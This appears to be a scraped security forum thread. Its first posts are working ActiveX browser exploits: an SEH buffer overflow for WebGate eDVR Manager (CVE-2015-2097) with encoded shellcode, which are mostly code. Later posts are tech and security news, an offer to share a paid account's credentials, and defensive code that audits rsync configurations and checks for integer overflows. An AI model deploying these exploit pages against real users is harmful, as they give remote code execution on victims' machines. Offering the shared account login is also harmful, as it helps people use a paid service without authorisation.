"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++) { buff2 += "A"; } fbuff = buff1 + nseh + seh + nops + sc + buff2; ssac.StopSiteAllChannel(fbuff); </script> </html> Source
  17. <html> <!-- # Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day) # Date: 26th MArch, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: 1, 6, 42, 0 # Tested on: Windows XP SP3 (IE6/7/8) # CVE : 2015-2097 targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll" prototype = "Sub LoadImage ( ByVal bstrFullPath As String )" memberName = "LoadImage" progid = "WESPMONITORLib.WESPMonitorCtrl" argCount = 1 For full analysis of the exploit refer http://blog.disects.com/2015/03/webgate-edvr-manager.html --> <object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'> </object> <script> var arg1 = ""; nops = ""; var buff = ""; for(i=0;i<268;i++) { arg1 += "B"; } nseh = "\xeb\x10\x90\x90"; //jmp over addr seh = "\x71\x47\x01\x10"; //pop pop ret addr document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>"); for(i=0;i<200;i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + 
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++) { buff += "A"; } // [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode] fbuff = arg1 + nseh + seh + nops + sc + buff; target.LoadImage(fbuff); </script> </html> Source
  18. @shadowSQLi I have already talked to the people at OLX; the package will arrive by courier on Thursday (Friday at the latest). I will come back with an edit when I receive the parcel to tell you what they sent me.
  19. Modular: everything in the browser is a module, a web app running in its own process. Construct your own browsing experience by selecting the right modules for you. Hackable: want vertical tabs? Write some JS & CSS! Customised autocomplete engine? JS! Every behavior is programmatic and exposed through APIs. Open source: the entire technology stack is open source. Modify existing modules, or create your own to extend the behavior of Breach. Getting involved: Homepage: Breach - A new modular Browser; Mailing list: breach-dev@googlegroups.com; IRC channel: #breach on Freenode. You can find a list of modules available or under development here: List of Modules. Running Breach on Linux: see instructions here: Running Breach on Linux. Link: https://github.com/breach/breach_core/ Source: TF
  20. Hello SilaxHe and welcome to the forum.
  21. I will share my personal account with you (send a PM and I will give you the user + pass) - Over 10 posts (no trolling / offtopic) - At least 2/3 months of seniority. - Don't post here, send me a PM! Those who don't meet these conditions shouldn't bother. 10-month subscription 10.00 euro without VAT SMS - 0********* - Vodafone 04.12.2014 16:06:24 04.10.2015 17:06:24 Active
  22. Yesterday, at its annual F8 Developer Conference in San Francisco, Facebook officially turned its Messenger app into a platform. Facebook's Messenger Platform allows third-party app developers to integrate their apps with the Facebook Messenger app. Other popular messaging apps, such as China's WeChat, already offer similar features, but Facebook's release is much bigger than any other platform. At F8, Facebook released SDK v4.0 for iOS and Android along with Graph API v2.3, which let app developers add the new Messenger Platform features to their own apps quickly. Facebook users can install these compatible third-party apps from the Messenger app, which lets them send animated GIFs, images, videos and other content within Facebook Messenger easily. BOON FOR BOTH FACEBOOK AND THIRD-PARTY DEVELOPERS The Facebook Messenger Platform lets third-party app developers reach Facebook's 600 million users, so the move will be a boon for them. On the other hand, the move helps Facebook integrate its messaging service directly into the vast ecosystem of Android and iOS apps. BUSINESSES ON MESSENGER The social networking giant also announced a "Businesses on Messenger" feature that will soon let users connect directly with companies and talk to them, replacing retailer chat windows in the process. When customers place an order for goods or services, they will be prompted to go to Facebook Messenger for communications including modifying orders, tracking orders, returning merchandise and getting answers to questions. Third-party app developers who are interested in learning more and integrating their apps with the new Facebook Messenger Platform can grab the SDK from Facebook's website.
LAUNCH PARTNERS The new Messenger Platform is open to all developers, but Facebook initially launched 40 different apps with its partners, including ESPN, Giphy, Imgur, The Weather Channel and Bitmoji. The complete list of Messenger Platform launch partners is as follows: Action Movie FX, Bitmoji, Cleo Video Texting, Clips, ClipDis, Ditty, Dubsmash, Effectify, EmotionAR, Emu, ESPN, FlipLip Voice Changer, Fotor, GIF Keyboard, GIFJam, Giphy, Hook'd, Imgur, Imoji, JibJab, Kanvas, Keek, Legend, Magisto, Meme Generator, Noah Camera, Pic Stitch, PicCollage GIF Cam, PingTank, Pyro!, Score! on Friends, Selfied, Shout, Sound Clips, StayFilm, Stickered, Strobe, Tackl, Talking Tom, Tempo, The Weather Channel, to.be Camera, UltraText, Wordeo. Facebook users can also install these apps from a prompt if they receive a message generated by one of the updated apps. Source
  23. Google wants to save its users' bandwidth at home. The company has released a "Data Saver extension for Chrome," bringing its data compression feature to desktop users for the first time. When your laptop is tethered to a mobile hotspot for its Internet connection, the new Data Saver extension for Chrome helps you reduce bandwidth usage by compressing the pages you visit. If you are unaware of it, Google's data compression proxy service is designed to save users' bandwidth, load pages faster and increase security (by checking for malicious web pages) on smartphones and tablets. REDUCE AS MUCH AS 50% OF DATA USAGE Until now, the data compression service has benefited only mobile users, but the new Data Saver Chrome extension aims to help desktop users by reducing their data usage by as much as 50 percent. When you visit a website, the web server delivers the requested files to your browser. If enabled on the server, gzip compresses web pages and style sheets before they are sent to the browser. Gzip compression drastically reduces transfer time since the files are much smaller. The Data Saver extension for Chrome checks whether the website you visit has gzip enabled. If not, it compresses the requested web page via the Google data compression proxy and makes it significantly smaller. AVAILABLE FOR CHROME 41 AND HIGHER The Data Saver Chrome extension currently doesn't support secure SSL pages or incognito pages, and Google notes that users may experience issues while the extension is enabled. Data Saver is available in Chrome for both Android and iOS. Users will need Chrome 41 or higher to use the extension. As soon as you install it, the extension starts working by default. To disable it, click the Data Saver icon in the menu bar and select "Turn Off Data Saver."
You can now download Google's new Data Saver extension for Chrome, currently in beta, from the Chrome Web Store. The extension was released on March 23 without any announcement from the search giant. Source
  24. ANTLabs today is expected to roll out patches for a vulnerability in its InnGate Internet gateways, which are popular in hospitality and convention locations. The gateways provide temporary Internet access to hotel guests or conference attendees, for example via kiosks. The vulnerability (CVE-2015-0932), discovered by security company Cylance, gives an attacker remote read and write access to the device's file system. “Remote access is obtained through an unauthenticated rsync daemon running on TCP 873. Once the attacker has connected to the rsync daemon, they are then able to read and write to the file system of the Linux based operating system without restriction,” wrote researcher Brian Wallace in an advisory published today. Full read and write access can be leveraged for remote code execution and lets an attacker backdoor the device or add an executable or a new authenticated root-level user, Cylance said. “Once full file system access is obtained, the endpoint is at the mercy of the attacker,” Wallace wrote. The exposed rsync service is trivial to abuse, Wallace said, using a few commonly known Linux or UNIX commands to find available rsync shares and list files in the root; there are also rsync commands for uploading and downloading files. Rsync is a utility on Linux and UNIX machines used for file synchronization and file transfers, either locally or between remote computers. While the risk from such a vulnerability is generally limited to crimes such as fraud and identity theft, a research report last November from Kaspersky Lab on the DarkHotel APT group shows that targeted attacks against business hotel Wi-Fi networks are not out of the question.
DarkHotel operates primarily in Asia, compromising such Wi-Fi networks and infecting users as they connect with a phony software update, such as an Adobe Flash update, which instead pushes a digitally signed piece of malware with a keylogger and other data-stealing capabilities; the stolen data is sent to the attackers via a backdoor. The DarkHotel campaign was also able to access other systems on hotel networks, such as machines holding registration information, which allowed the APT group to infect only specific guests with the phony update installer. Cylance said the vulnerability is severe and requires little sophistication to exploit. “An attacker exploiting the vulnerability in CVE-2015-0932 would have the access to launch DarkHotel-esque attacks against guests on the affected hotel’s WiFi. Targets could be infected with malware using any method from modifying files being downloaded by the victim or by directly launching attacks against the now accessible systems,” Wallace said. “Given the level of access that this vulnerability offers to attackers, there is seemingly no limit to what they could do.” Cylance said it scanned the Internet's IPv4 space for the ANTLabs devices and found 277 that could be compromised from the Internet, most of them in North America but some in Asia, the Middle East and Europe. In addition to applying the patch upon its release, Cylance said locations running the vulnerable devices could block unauthenticated rsync access via a TCP-DENY command on port 873. Source
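As an added, defender-side illustration (example code written for this page, not Cylance's or ANTLabs' material), the following Python audits an rsyncd.conf for modules exposed the way the advisory describes: no `auth users` and no `hosts allow`, so any client can connect unauthenticated, with writable modules rated highest. The configuration is a constructed sample, and the iptables lines are a generic Linux equivalent of the advisory's port-873 deny rule; they are an assumption, not the vendor's TCP-DENY syntax.

```python
import configparser

# Constructed sample rsyncd.conf (not taken from the advisory). Module [root]
# mirrors the InnGate finding: the whole filesystem exported read/write with no
# authentication and no host restriction. [backup] shows the restricted form.
SAMPLE_RSYNCD_CONF = """\
uid = root
gid = root
use chroot = no

[root]
path = /
read only = no
comment = entire filesystem

[backup]
path = /var/backup
read only = yes
hosts allow = 10.0.0.0/24
auth users = backupuser
secrets file = /etc/rsyncd.secrets
"""


def parse_rsyncd_conf(text):
    """Return {module_name: {option: value}} for an rsyncd.conf.

    rsyncd.conf is INI-like; options before the first [module] are global and
    act as defaults for every module, which ConfigParser's default section
    models once the global block is given a section name.
    """
    parser = configparser.ConfigParser(interpolation=None,
                                       default_section="__global__")
    parser.read_string("[__global__]\n" + text)
    return {name: dict(parser.items(name)) for name in parser.sections()}


def _is_false(value):
    return value.strip().lower() in ("no", "false", "0")


def audit_rsyncd(text):
    """Flag modules reachable without credentials from any source address.

    rsync semantics: a missing 'auth users' means anonymous access, a missing
    'hosts allow' means every host may connect, 'read only' defaults to yes.
    """
    findings = []
    for name, opts in parse_rsyncd_conf(text).items():
        anonymous = not opts.get("auth users", "").strip()
        any_host = not opts.get("hosts allow", "").strip()
        writable = _is_false(opts.get("read only", "yes"))
        if anonymous and any_host:
            findings.append({
                "module": name,
                "path": opts.get("path", ""),
                "writable": writable,
                "severity": "critical" if writable else "high",
            })
    return findings


def deny_rules(allowed_cidr):
    """Generic iptables form (assumed equivalent of the advisory's TCP-DENY on
    port 873): permit rsync only from a management network, drop the rest."""
    return [
        f"iptables -A INPUT -p tcp --dport 873 -s {allowed_cidr} -j ACCEPT",
        "iptables -A INPUT -p tcp --dport 873 -j DROP",
    ]


if __name__ == "__main__":
    for f in audit_rsyncd(SAMPLE_RSYNCD_CONF):
        mode = "read/write" if f["writable"] else "read-only"
        print(f"[{f['severity']}] module '{f['module']}' exports {f['path']} "
              f"{mode} to any host, unauthenticated")
    print("\n".join(deny_rules("10.0.0.0/24")))
```

Running the script against the sample reports only the `root` module as critical; `backup` passes because it requires both a known source network and a named user. On a real gateway the same check belongs in configuration management so that a module without both controls never reaches production.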
  25. Students from M.I.T. have devised a new and more efficient way to scour raw code for integer overflows, the troublesome programming bugs that serve as a popular exploit vector for attackers and often lead to system crashes. Researchers from the school's Computer Science and Artificial Intelligence Laboratory (CSAIL) last week debuted the platform, dubbed DIODE, short for Directed Integer Overflow Detection. As part of an experiment, the researchers tested DIODE on code from five different open source applications. The system generated inputs that triggered three previously known integer overflows, and it also found 11 new errors. Four of the 11 overflows the team found are apparently still lingering in the wild, but the developers of those apps have been informed and CSAIL is awaiting confirmation of fixes. Integer overflows result when computers can't store numbers – usually because they haven't been sanity checked – in the memory that's been allocated for them. Sanity checks are the simple tests a program applies to validate a value before using it. The seven researchers behind DIODE – Stelios Sidiroglou-Douskos, Eric Lahtinen, Nathan Rittenhouse, Paolo Piselli, Fan Long, Deokhwan Kim, and Martin Rinard – presented the system last week at the 20th ASPLOS (Architectural Support for Programming Languages and Operating Systems) conference in Istanbul. The tool works by automatically generating inputs that trigger overflow errors at critical sites. DIODE, which works on off-the-shelf x86 binaries, extracts target expressions and branch conditions for each memory allocation site. As Stelios Sidiroglou-Douskos, a research scientist at CSAIL and the lead author of the paper, writes, whenever DIODE encounters an integer that may be used in a dangerous operation, the system records the current state of the symbolic expression.
The system doesn't trigger an overflow right away, but characterizes the values around it to better inform the programmer. If DIODE finds a trigger value, it records it to help with any future debugging. DIODE's inputs should identify and then satisfy the requisite sanity checks and “generate an overflow in the target expression, and impose no other constraints on the specific path that the input takes to trigger the overflow,” according to Sidiroglou-Douskos. DIODE, which was supported by a DARPA grant, isn't the first debugging tool developed to dig up integer overflows. Researchers with CSAIL previously developed static analysis tools such as SIFT (.PDF), which points out inputs that can lead to overflow errors, and KINT (.PDF), a PHP tool. As the team's academic paper points out, however, unlike SIFT, which requires direct access to source code, DIODE works directly with stripped x86 code. The tool also bests KINT, which often generates a large number of false positives, by not producing them. M.I.T. hopes to release DIODE to the public as open source after the program it's being developed under, DARPA's Mission-oriented Resilient Clouds (MRC) program, concludes in October 2015. Source
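To make the allocation-site scenario concrete, here is an added Python illustration (written for this page; it is not DIODE's code and not from the paper). A typical image-decoder size computation is emulated in 32-bit unsigned arithmetic, a weak and an overflow-aware sanity check are defined, and a small directed search looks for an input that satisfies the check yet overflows the target expression, which is exactly the condition the article says DIODE's generated inputs must meet. The decoder expression and the candidate dimensions are constructed for the example; DIODE itself derives them from x86 binaries symbolically.

```python
UINT32_MAX = 0xFFFFFFFF


def wrap32(value):
    """The value a C uint32_t actually holds after the arithmetic wraps."""
    return value & UINT32_MAX


def overflows32(value):
    """True when the mathematically exact result does not fit in 32 bits."""
    return value < 0 or value > UINT32_MAX


def alloc_size(width, height, bpp=4):
    """Target expression at a constructed allocation site: a bitmap decoder
    computing how many bytes to allocate for a width x height image at
    4 bytes per pixel (the same shape as the real sites DIODE analyses)."""
    return width * height * bpp


def weak_check(width, height, bpp=4):
    """Sanity check that only rejects zero or negative dimensions. The product
    can still wrap, so the buffer ends up far smaller than the pixel data that
    is later copied into it."""
    return width > 0 and height > 0


def strong_check(width, height, bpp=4):
    """Overflow-aware check: bound the operands before multiplying, so the
    expression provably fits in 32 bits (integer division cannot overflow)."""
    return (width > 0 and height > 0
            and height <= UINT32_MAX // bpp
            and width <= UINT32_MAX // (height * bpp))


def find_overflow_input(check, expr, candidates):
    """Directed search in the spirit of DIODE: return the first candidate that
    passes the site's sanity check *and* makes the target expression overflow,
    as (width, height, exact_value, wrapped_value). None means no candidate
    satisfied both conditions, i.e. the check protects this site."""
    for width, height in candidates:
        exact = expr(width, height)
        if check(width, height) and overflows32(exact):
            return (width, height, exact, wrap32(exact))
    return None


# Constructed candidate dimensions, from ordinary to adversarial.
CANDIDATES = [(640, 480), (1920, 1080), (65536, 65536), (0x10000000, 16)]


if __name__ == "__main__":
    # The weak check lets 65536 x 65536 through: 2**34 wraps to 0, so the
    # decoder would allocate zero bytes and then write 16 GiB of pixels.
    print("weak check:  ", find_overflow_input(weak_check, alloc_size, CANDIDATES))
    print("strong check:", find_overflow_input(strong_check, alloc_size, CANDIDATES))
```

The pairing of checks shows why DIODE insists on satisfying the sanity checks rather than ignoring them: an input that simply violates the check is rejected before the allocation, so only inputs that pass it and still overflow reveal a real bug.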